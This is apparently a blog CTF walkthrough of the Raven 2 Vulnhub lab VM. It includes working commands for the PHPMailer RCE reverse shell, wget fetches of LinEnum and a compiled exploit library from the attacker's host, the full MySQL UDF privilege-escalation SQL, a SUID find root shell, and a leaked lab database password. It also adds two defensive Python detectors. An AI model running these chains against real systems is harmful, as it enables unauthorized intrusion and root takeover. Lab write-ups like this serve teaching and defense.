Raven 2: Vulnhub Walkthrough

Hello everyone and welcome to yet another CTF challenge walkthrough. This time we’ll be putting our hands on Raven 2, the sequel to the previously solved Raven. Raven 2 is a Beginner/Intermediate boot2root machine. The goal is to snag 4 flags and get root on the target VM.

Table of contents:

  1. Port scanning and IP discovery.
  2. Hitting port 80 and discovering the WordPress CMS.
  3. Directory enumeration to find a directory called “vendor”.
  4. Discovering a file called PATH to snag flag 1.
  5. Discovering a file called VERSION to snag the PHPMailer version.
  6. Exploiting the RCE in PHPMailer version 5.2.6.
  7. Making local changes to the exploit code for successful delivery of the payload.
  8. Getting a netcat shell using the uploaded payload.
  9. Snagging flag 2 in /var/www.
  10. Reading the database password from the wp-config file.
  11. Running LinEnum.sh to enumerate processes.
  12. Exploiting the UDF dynamic library vulnerability using the exploit numbered 1518.c on Exploit-DB.
  13. Setting the SUID bit on find.
  14. Getting root access.
  15. Snagging flag4 in /root.
  16. Manually traversing the system to find flag3.

Let’s get started then!

Discovering the active devices on the network using netdiscover and getting the IP address of our victim machine. In this case the IP address is 192.168.1.101.

Running nmap against the victim machine, we found three open ports: 22, 80 and 111.

So we instantly moved to port 80 and discovered the website of Raven Security.

We thought it would be wise to run a directory brute-force before scanning anything else. So we ran a directory buster scan and found a “vendor” directory on the victim machine.

Accessing /vendor listed the following files and folders.

Among them a file called PATH caught our attention, since it is no ordinary name. We opened it in the browser only to find flag1!

There was yet another file worth noting, called VERSION. On opening it we found the version of something. It was unclear which software had version 5.2.6, but look at the /vendor listing again… a file exists called PHPMailerAutoload.php. It is fairly certain now that version 5.2.6 is the PHPMailer version. So, after a bit of internet surfing, we found an RCE exploit for that version!

Now we downloaded this Python file, but don’t run it yet! There are some changes to be made first, listed below.

  1. Add a coding: utf-8 tag at the top of the file.
  2. Set the target of the vulnerability to 192.168.1.101/contact.php, the page where the vulnerable PHPMailer call is made.
  3. Set the backdoor’s name. Let it be backdoor.php for now.
  4. Set the local IP in the subprocess call.
  5. And finally, the location to upload the backdoor to.

Now run the Python script and wait for the success message.

Activate a netcat listener on port 443, because the backdoor connects back on port 443 as written in the Python code (the subprocess call).

Upon opening the location of the backdoor in the browser we immediately got a shell!

Now we upgraded to a proper TTY using the Python one-liner and manually traversed to /var/www, where we discovered flag2!

python -c 'import pty;pty.spawn("/bin/bash")'
cd /var/www
cat flag2.txt

Now we thought of checking the WordPress directory, as we had done in the prequel, Raven 1.

cd /var/www/html/wordpress
cat wp-config.php

We found the database root password! It was “R@v3nSecurity”.

Then we changed the working directory to /tmp and imported LinEnum.sh, a script that enumerates many basic and advanced Linux details.

It was hosted in a folder on our local machine and fetched onto the victim machine using the wget command.

My local IP address was 192.168.1.109 in this case.

cd /tmp
wget http://192.168.1.109/LinEnum.sh
chmod 777 LinEnum.sh
./LinEnum.sh

LinEnum reported a MySQL-Exploit-Remote-Root-Code-Execution-Privesc vulnerability! (For more info: https://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.html)

So we searched for a UDF dynamic library exploit and found it as “1518.c” in the Exploit Database.

https://www.exploit-db.com/exploits/1518/

The exploit works by compiling the raw C code into a .so file, transferring it to the victim machine and then abusing the MySQL vulnerability to load it.

The first step was to mirror and compile it.

searchsploit -m 1518.c
gcc -g -shared -Wl,-soname,1518.so -o 1518.so 1518.c -lc

Hence, we transferred this “.so” file into the /tmp directory on the victim’s machine.

wget http://192.168.1.109/1518.so
chmod 777 1518.so

Now we logged in to the MySQL interface.

mysql -u root -p

<entered password>

After getting a MySQL shell, we started exploiting it using the vulnerability we had just found:

use mysql;

Now we created a table called “foo”.

Into this table we inserted the contents of the 1518.so file we had just fetched from our local machine into /tmp (load_file reads it in as a blob).

We dumped the same contents out to the /usr/lib/mysql/plugin/ directory, which is where MySQL loads UDF libraries from.

In the most important step, we created a UDF named do_system, which points MySQL at the function implemented in that library.

Hence, we invoked do_system with “chmod u+s /usr/bin/find” to set the SUID bit on find:

create table foo(line blob);
insert into foo values(load_file('/tmp/1518.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
create function do_system returns integer soname '1518.so';
select do_system('chmod u+s /usr/bin/find');
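From the defender’s side, the sequence above is distinctive in MySQL’s general query log: a .so read with load_file, written into plugin_dir with INTO DUMPFILE, then CREATE FUNCTION ... SONAME, all on one connection. The detector below is an added example (not code from the post) that flags that chain in a constructed log excerpt; the log layout and the plugin_dir path are assumptions, so take plugin_dir from SHOW VARIABLES on your own server.

```python
import re
from typing import Dict, List, Set

# Constructed MySQL general-log excerpt (not from the original post): one session that
# stages a shared object through a table and registers it as a UDF, plus an unrelated query.
SAMPLE_GENERAL_LOG = """\
2018-11-10T12:00:01.000000Z    12 Connect  root@localhost on mysql using Socket
2018-11-10T12:00:02.000000Z    12 Query    use mysql
2018-11-10T12:00:03.000000Z    12 Query    create table foo(line blob)
2018-11-10T12:00:04.000000Z    12 Query    insert into foo values(load_file('/tmp/1518.so'))
2018-11-10T12:00:05.000000Z    12 Query    select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so'
2018-11-10T12:00:06.000000Z    12 Query    create function do_system returns integer soname '1518.so'
2018-11-10T12:00:07.000000Z    12 Query    select do_system('chmod u+s /usr/bin/find')
2018-11-10T12:00:08.000000Z    13 Query    select id, post_title from wp_posts limit 5
"""
PLUGIN_DIR = "/usr/lib/mysql/plugin"  # assumed; read it from SHOW VARIABLES LIKE 'plugin_dir'
LOG_RE = re.compile(r"^\S+\s+(?P<conn>\d+)\s+(?P<cmd>\w+)\s+(?P<arg>.*)$")
RULES = [  # each rule is (name, pattern over the query text)
    ("udf_load_file", re.compile(r"\bload_file\s*\(\s*'[^']*\.so'", re.I)),
    ("udf_dumpfile_plugin_dir", re.compile(r"\binto\s+dumpfile\s+'" + re.escape(PLUGIN_DIR), re.I)),
    ("udf_create_function", re.compile(r"\bcreate\s+function\b.*\bsoname\b", re.I)),
]

def scan_general_log(text: str) -> List[Dict[str, str]]:
    """Return one hit per logged query that matches a UDF-abuse rule."""
    hits: List[Dict[str, str]] = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m or m.group("cmd") != "Query":
            continue  # connect/quit/other events carry no query text
        query = m.group("arg").strip()
        for name, pat in RULES:
            if pat.search(query):
                hits.append({"rule": name, "conn": m.group("conn"), "query": query})
    return hits

def udf_chain_connections(hits: List[Dict[str, str]]) -> Set[str]:
    """Connections that both wrote a file into plugin_dir and registered a UDF from it."""
    by_conn: Dict[str, Set[str]] = {}
    for h in hits:
        by_conn.setdefault(h["conn"], set()).add(h["rule"])
    return {c for c, rules in by_conn.items()
            if {"udf_dumpfile_plugin_dir", "udf_create_function"} <= rules}

if __name__ == "__main__":
    found = scan_general_log(SAMPLE_GENERAL_LOG)
    for h in found:
        print(h["rule"], "on connection", h["conn"], "->", h["query"])
    print("connections completing the UDF chain:", udf_chain_connections(found))
```

Keeping plugin_dir unwritable by the mysql user and setting secure_file_priv removes the two prerequisites this chain depends on.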

Now we went back to the /tmp directory and executed commands through the now-SUID find utility.

touch raj
find raj -exec "whoami" \;
find raj -exec "/bin/sh" \;
cd /root
ls
cat flag4.txt
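The chmod u+s /usr/bin/find step is exactly what a periodic setuid audit is meant to catch. The script below is an added example (not from the post or from the LinEnum project) that compares the setuid files present on a host against a known-good baseline; the baseline list and the stat entries it is tested on are constructed assumptions.

```python
import os
import stat
from typing import Iterable, Set, Tuple

# Assumed baseline of expected setuid binaries; build yours from a clean image of the same OS.
BASELINE_SUID = {"/usr/bin/passwd", "/usr/bin/sudo", "/bin/su", "/bin/mount", "/bin/umount"}

def is_setuid(mode: int) -> bool:
    """True when the setuid bit (chmod u+s) is set on a regular file; directories are ignored."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID)

def suid_from_modes(entries: Iterable[Tuple[str, int]]) -> Set[str]:
    """Pure variant over (path, st_mode) pairs so the logic can be checked offline."""
    return {path for path, mode in entries if is_setuid(mode)}

def walk_suid(root: str = "/") -> Set[str]:
    """Live variant: lstat every file under root (symlinks are not followed)."""
    found: Set[str] = set()
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable or vanished entries are skipped, not fatal
            if is_setuid(st.st_mode):
                found.add(path)
    return found

def unexpected_suid(found: Set[str], baseline: Set[str] = BASELINE_SUID) -> Set[str]:
    """Setuid files absent from the baseline; on Raven 2 this is where /usr/bin/find shows up."""
    return found - baseline

# Constructed stat results (not from the original post) as left behind by 'chmod u+s /usr/bin/find'.
CONSTRUCTED_ENTRIES = [
    ("/usr/bin/passwd", stat.S_IFREG | stat.S_ISUID | 0o755),
    ("/usr/bin/find", stat.S_IFREG | stat.S_ISUID | 0o755),
    ("/usr/bin/ls", stat.S_IFREG | 0o755),
    ("/tmp/1518.so", stat.S_IFREG | 0o777),
]

if __name__ == "__main__":
    print("unexpected setuid files:", sorted(unexpected_suid(suid_from_modes(CONSTRUCTED_ENTRIES))))
```

Run walk_suid() from a cron job and alert on a non-empty unexpected_suid() result to catch this kind of persistence shortly after it is planted.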

The only flag left to find was flag3.txt. You can do this with the find utility, but we had a bit of luck and found it manually!

It was lying in /var/www/html/wp-content/uploads/2018/11

We copied it to /var/www/html using cp.

Since it was a PNG file we had to view it in the browser.

Hence, this is how we rooted Raven 2 and snagged all four flags! Hope you liked it!

Author: Harshit Rajpal is an InfoSec researcher and a left and right brain thinker.

The post Raven 2: Vulnhub Walkthrough appeared first on Hacking Articles.